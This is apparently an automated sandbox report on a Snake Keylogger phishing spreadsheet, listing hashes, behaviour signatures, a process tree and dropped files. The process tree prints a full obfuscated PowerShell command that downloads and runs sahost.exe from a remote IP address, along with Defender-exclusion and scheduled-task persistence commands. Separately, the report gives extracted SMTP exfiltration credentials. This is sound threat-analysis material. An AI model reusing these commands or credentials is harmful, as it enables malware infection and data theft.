Analysis

  • max time kernel
    101s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    05/08/2024, 11:51

General

  • Target

    Purchase Order_45020.xls

  • Size

    635KB

  • MD5

    8bb23c70321a50ccae1047cb639b816e

  • SHA1

    79358c1f386045803c6941fa3f3cf22bf6116876

  • SHA256

    f72e4cc0eef0ec4857e235dd3f92cace525b1edc104feda10ccdbc22ca3609bf

  • SHA512

    a2a698943777a8bfcc9f977eed424ec59f9a2219ab7c073c8a386ca1dad37730fdbd8072dcd56bb2989ecb9115c41ba34bb9f451d92c11f089f50f24a8db242c

  • SSDEEP

    12288:lw+LYINaL66YVYhsxsIWviBk6ZCZuGTyJYCEBeF5hQ+rXonXv6:lLOuVYhWEZuGWjnhVr

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    us2.smtp.mailhostbox.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    yUiavQX8

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 5 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk, where infostealers often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Detected phishing page
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Purchase Order_45020.xls"
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2432
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2852
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c PoWersheLL.exE -Ex Bypass -noP -W 1 -C DEvICECRedeNtIaldEpLoyMENT ; IEX($(IEx('[System.TeXt.EncOding]'+[CHAR]58+[cHar]0x3A+'uTF8.GeTStrING([sYsTeM.cOnVerT]'+[ChAR]58+[CHAr]0X3a+'fRomBase64sTrING('+[Char]34+'[...]'+[CHAR]0X22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2516
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWersheLL.exE -Ex Bypass -noP -W 1 -C DEvICECRedeNtIaldEpLoyMENT ; IEX($(IEx('[System.TeXt.EncOding]'+[CHAR]58+[cHar]0x3A+'uTF8.GeTStrING([sYsTeM.cOnVerT]'+[ChAR]58+[CHAr]0X3a+'fRomBase64sTrING('+[Char]34+'JEc3a3gxeSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iZXJERUZJbklUSW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElIeWd4RlpHYVgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGh4SSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEN6WHJXY3RlUWYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1VyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRdUtFT2ZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc3a3gxeTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNTUvc2Fob3N0LmV4ZSIsIiRlTlY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO1NUQVJ0LXNsZUVQKDMpO1NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[CHAR]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f8iokz3r.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2284
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFC79.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFC78.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3012
        • C:\Users\Admin\AppData\Roaming\sahost.exe
          "C:\Users\Admin\AppData\Roaming\sahost.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2424
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\mcuByajwuP.exe"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2224
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mcuByajwuP" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4615.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2500
          • C:\Users\Admin\AppData\Roaming\sahost.exe
            "C:\Users\Admin\AppData\Roaming\sahost.exe"
            5⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:1884

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NFAY0EOS\mgz8n[1].htm

    Filesize

    167B

    MD5

    0104c301c5e02bd6148b8703d19b3a73

    SHA1

    7436e0b4b1f8c222c38069890b75fa2baf9ca620

    SHA256

    446a6087825fa73eadb045e5a2e9e2adf7df241b571228187728191d961dda1f

    SHA512

    84427b656a6234a651a6d8285c103645b861a18a6c5af4abb5cb4f3beb5a4f0df4a74603a0896c7608790fbb886dc40508e92d5709f44dca05dd46c8316d15bf

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z7V06J7Q\mgz8n[1].htm

    Filesize

    5B

    MD5

    fda44910deb1a460be4ac5d56d61d837

    SHA1

    f6d0c643351580307b2eaa6a7560e76965496bc7

    SHA256

    933b971c6388d594a23fa1559825db5bec8ade2db1240aa8fc9d0c684949e8c9

    SHA512

    57dda9aa7c29f960cd7948a4e4567844d3289fa729e9e388e7f4edcbdf16bf6a94536598b4f9ff8942849f1f96bd3c00bc24a75e748a36fbf2a145f63bf904c1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5631886D.emf

    Filesize

    3.7MB

    MD5

    5c281e92895c037ec03644dd740681f1

    SHA1

    ba678c4ec18b291a6c60f9dd028692a7963bafcd

    SHA256

    b28fde07b37bce8db20db4dff95d092ccbbbe785ba3863108bf711c33f1604a5

    SHA512

    0dc968bba522b21ff568bcc9480466fba24d4419f415dcd75cebc525bd85271e2008cac7ff45e9167da59eec36f89537490201cd822ce1d8c00a88fd0a96fe50

  • C:\Users\Admin\AppData\Local\Temp\RESFC79.tmp

    Filesize

    1KB

    MD5

    0957fbb2438cbfdd5ec421ba17617952

    SHA1

    8cf763831d7489fe76239b1169f1792573126f9d

    SHA256

    aeef2d20604b631620f3df397d31e9358e48d9b5b3a2835bac64d186bb40f5b1

    SHA512

    6eee00f0cbb3673f1ce4ba75737630262f426de0514b9d2fb561b7dec97f318c41c3842461c82dcd408f6865a629582d324917d487725f85162d379860a5eecf

  • C:\Users\Admin\AppData\Local\Temp\f8iokz3r.dll

    Filesize

    3KB

    MD5

    a89b92fc177eeb5f1bc7de9d2015d716

    SHA1

    97aab92ef6d021c181f1bb4156f9425fa3284fa7

    SHA256

    94c210a44e526f42a6295387b5d2e49ed3fb8a0ee2a9afa7dc55cea4d69e18a7

    SHA512

    eefee38c8ca916bc389e455cea53780250558de63cbc4dd3c20ac91e9214341b9aecc6eb7e70df7e7b533768857941789d26bf995a1d90520b1aba56cf152a09

  • C:\Users\Admin\AppData\Local\Temp\f8iokz3r.pdb

    Filesize

    7KB

    MD5

    eb42e181e1d6f713d48f770179e7e864

    SHA1

    37491c34d6a27ea85356cad31e8598a39a1648b6

    SHA256

    84d95e28d1355357f3a87058016dcd8be0ea173072c609483f52c91f6e66bf88

    SHA512

    a72e9e3fabc9ef13de892aa8911807591ef99424a507a264e3601cb03e165d15ac267550bb1a2df2e1d84b517034be28a5283438b8c375283ec1e1acd12661a7

  • C:\Users\Admin\AppData\Local\Temp\tmp4615.tmp

    Filesize

    1KB

    MD5

    2d2c335b67ae45d5b851b46118e273cc

    SHA1

    5a2a20e541088dce83fc4c02154564bd6cb7df33

    SHA256

    1897b5b21dacbcb3925d647ba252ed59634beece753cae4a17999b71d008962b

    SHA512

    f40e6556eef32deb31571d32691e01f46ff792c6f6ab8a6699a100161b8854b2f24aaf358748e8055ef7d9a7daa68d99adc61c93eb1d153df3814dfca24481c7

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NSWVUD8HS9E5M6ZZ2U9Y.temp

    Filesize

    7KB

    MD5

    c3a132dff88501e17ef6298c872474e1

    SHA1

    7010f595ae313d30aa65c807c13d7068c22dcade

    SHA256

    73989bfa1f2111145b297a5594dccf86bfd448a038c3e5dece7b52f60e93b40d

    SHA512

    7dec3c0ccc3d50b6a42958008f464f4b2e076d5be304e2100265f6fb00a07ba1b7d0ed606e70e5f90f22291e316d1c5b33d3e8c817a1f4568deeb6739800ef4c

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCFC78.tmp

    Filesize

    652B

    MD5

    607933dbcfb80685c4df33884dfba499

    SHA1

    e822782d351e96a63aeda2e22cb15c35e7330f68

    SHA256

    8e61fcefe5fef9e17a510be1ce331e03f7dc49139ddfd9b62a4e9eed3e5364cc

    SHA512

    d204168a871150977eaec1d8a62d783fb11c5ea29088418cb59faa1f09f800490d30b6cd35e268c792d9de7cc377f5164a48fdcf63aeec5af627cf20700a569b

  • \??\c:\Users\Admin\AppData\Local\Temp\f8iokz3r.0.cs

    Filesize

    456B

    MD5

    ccf27854f450f6e0eae3ccb817133720

    SHA1

    dd7a31a2102d26df8a678f860f619c0c478bfb6a

    SHA256

    c6e4a371ddffa99f9ed06030df8fe38e03e5d96487098f663468b5dc1edf2c08

    SHA512

    1a4ecdc8be0f2ea6fa66ca49cba83f433195503a19090cfc36f987e386b3bb275dda95deefb1e36c8988c357370a43d451c8b583a4e1699cce8849462b6125c2

  • \??\c:\Users\Admin\AppData\Local\Temp\f8iokz3r.cmdline

    Filesize

    309B

    MD5

    4d32910e25cc272776d43d856761316e

    SHA1

    40198ff9a8663393a6b20265d496d20fa83445c2

    SHA256

    b7841efa17155f268db942b50e50baf077af1d02cdb3973549a70d40582948a1

    SHA512

    925dd096268f9859cde70b2feb9b6fa40c76c43773d33ccee1047b27143ec60cdf39f5986e3ee371b3e27b006b800dcb31ae5e05df336d975304de8cb5bc1a60

  • \Users\Admin\AppData\Roaming\sahost.exe

    Filesize

    633KB

    MD5

    db2ccc4f812fabd3daac27ab5691e814

    SHA1

    28afcca9569e0e46099a2a6a30d4ef45c4113852

    SHA256

    2e70dc91594c86dcb95d4dafb804cff46ef3fc3ae02d0358b8b4be015937a9a0

    SHA512

    95157f7661de6d5fb2a06ec59ec2442790acc391ef0c3d8b5c01c0e0f92b1befcdee40394970ed3efd6f6020df0195ad6445e7401658234c704369c5a3e473f5

  • memory/1884-83-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1884-80-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1884-74-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1884-76-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1884-78-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1884-82-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/1884-85-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1884-87-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2424-57-0x00000000008D0000-0x0000000000974000-memory.dmp

    Filesize

    656KB

  • memory/2424-62-0x00000000059C0000-0x0000000005A28000-memory.dmp

    Filesize

    416KB

  • memory/2424-58-0x00000000004E0000-0x00000000004F8000-memory.dmp

    Filesize

    96KB

  • memory/2424-60-0x0000000000520000-0x0000000000536000-memory.dmp

    Filesize

    88KB

  • memory/2424-59-0x0000000000500000-0x000000000050E000-memory.dmp

    Filesize

    56KB

  • memory/2432-24-0x0000000001FC0000-0x0000000001FC2000-memory.dmp

    Filesize

    8KB

  • memory/2432-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2432-61-0x00000000734CD000-0x00000000734D8000-memory.dmp

    Filesize

    44KB

  • memory/2432-1-0x00000000734CD000-0x00000000734D8000-memory.dmp

    Filesize

    44KB

  • memory/2432-89-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2432-92-0x00000000734CD000-0x00000000734D8000-memory.dmp

    Filesize

    44KB

  • memory/2852-23-0x0000000002820000-0x0000000002822000-memory.dmp

    Filesize

    8KB